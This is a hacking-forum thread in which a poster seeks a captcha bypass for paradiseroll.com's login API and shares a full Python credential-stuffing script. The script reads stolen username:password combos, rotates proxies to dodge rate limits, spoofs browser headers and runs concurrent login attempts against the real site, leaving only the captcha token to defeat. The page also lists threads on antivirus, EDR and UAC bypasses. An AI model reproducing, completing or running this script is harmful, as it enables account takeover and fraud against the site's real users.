Creating A Captcha Payload Bypass
by i3eaI - Sunday August 20, 2023 at 05:33 PM
#1
Hi so I'm having some trouble finding a payload bypass to get/find the captchaToken sent in a payload on a site. For some reason it sends the captcha token if you are on a normal browser but if you are on incognito than it does not let you login for the site. When you click login it generates a captchaToken (Im assuming it checks the useragent or somthing) and then gives a captchaToken thats sent in a payload.
This is the script I made/ we proxies to limit the rate limit. Thank you so much if you have a possible bypass for the captchaToken or even if you know that its not possible would help a lot! Thanks!
import requests import concurrent.futures import random def try_login(account, proxy_list):     username, password, email = account.strip().split(":")         # Randomly choose a proxy from the list     proxy = random.choice(proxy_list)         proxy_host, proxy_port, proxy_user, proxy_pass = proxy.strip().split(":")     proxy_dict = {         "http": f"http://{proxy_user}:{proxy_pass}@{proxy_host}:{proxy_port}/",         "https": f"http://{proxy_user}:{proxy_pass}@{proxy_host}:{proxy_port}/",     }     url = "https://api.paradiseroll.com/v1/auth/login"     headers = {         "Accept": "application/json, text/plain, */*",         "Accept-Encoding": "gzip, deflate, br",         "Accept-Language": "en-US,en;q=0.9",         "Content-Type": "application/json",         "Origin": "https://paradiseroll.com",         "Referer": "https://paradiseroll.com/",         "Sec-Ch-Ua": "\"Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"115\", \"Chromium\";v=\"115\"",         "Sec-Ch-Ua-Mobile": "?0",         "Sec-Ch-Ua-Platform": "\"Windows\"",         "Sec-Fetch-Dest": "empty",         "Sec-Fetch-Mode": "cors",         "Sec-Fetch-Site": "same-site",         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36",  # Change this to a typical browser user agent     }     payload = {         "username": username,         "password": password,         "captchaToken": "", #this is where Im trying to bypass     }     response = requests.post(url, json=payload, headers=headers, proxies=proxy_dict)     if response.status_code == 200:         print(f"Login successful for {email} using proxy {proxy_host}:{proxy_port}")         print("Response:", response.text)     else:         print(f"Login failed for {email} using proxy {proxy_host}:{proxy_port}")         print("Status Code:", response.status_code)         print("Response:", response.text) if __name__ == "__main__":     with open("proxies.txt", "r") as f:         proxies = f.readlines()     with open("accounts.txt", "r") as f:         accounts = f.readlines()     with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:         for account in accounts:             # Shuffle the proxies list before submitting             random.shuffle(proxies)             executor.submit(try_login, account, proxies)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  STOP PAYING FOR CAPTCHA SERVICES!!! UNLIMITED CAPTCHA SOLVER TUTORIAL HASBULLA 89 14,049 03-27-2026, 05:01 PM
Last Post: tokon308222
  [2026] Bypass AV / EDR Spearr 63 684 03-27-2026, 04:58 PM
Last Post: tokon308222
  code for breachforums ddos captcha sonix 1 408 02-06-2025, 07:33 AM
Last Post: 420
  Windows UAC Bypass Docs n Shit jahy 20 5,093 10-31-2024, 10:04 PM
Last Post: Spykee
  AntiFrida Bypass 13TB 0 1,212 11-08-2023, 07:38 PM
Last Post: 13TB



 Users browsing this thread: 1 Guest(s)